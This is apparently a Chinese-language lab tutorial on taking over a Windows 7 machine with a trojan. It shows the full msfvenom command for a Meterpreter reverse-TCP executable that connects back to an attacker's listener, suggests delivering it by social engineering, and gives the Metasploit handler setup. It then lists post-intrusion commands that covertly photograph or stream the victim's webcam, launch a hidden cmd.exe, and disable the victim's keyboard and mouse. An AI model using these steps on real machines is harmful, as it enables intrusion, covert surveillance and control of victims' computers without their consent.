利用木马植入并打开后门,实现入侵。
实验工具:
kali linux
win7
msfvenom
操作步骤
1.通过msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.100.129 lport=6666 -f exe R > /root/shell.exe
lhost---------本地IP地址
lport----------反向连接到主机的端口
R--------------木马生成后的路径
(此木马没有进行加壳,很容易被杀毒软件发现,更高级的必须深入研究)
2,把木马传输到要被攻击者的电脑上,对方一点开就会向自己的IP和端口发送一个tcp连接,(传输的方式有很多种,比如说社会工程学,)
3,运行msfconsole
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.100.129 ------设置本地IP地址
msf5 exploit(multi/handler) > set lport 6666 ------------------设置端口号
msf exploit(multi/handler) > exploit ----------------------------利用
只要对方运行木马就能入侵成功
可执行pwd查开自己的位置,是Linux还是Windows,Windows代表成功。
入侵成功后可以执行以下命令
webcam摄像头命令
webcam_list #查看摄像头
webcam_snap#通过摄像头拍照
webcam_stream #通过摄像头开启视频
execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘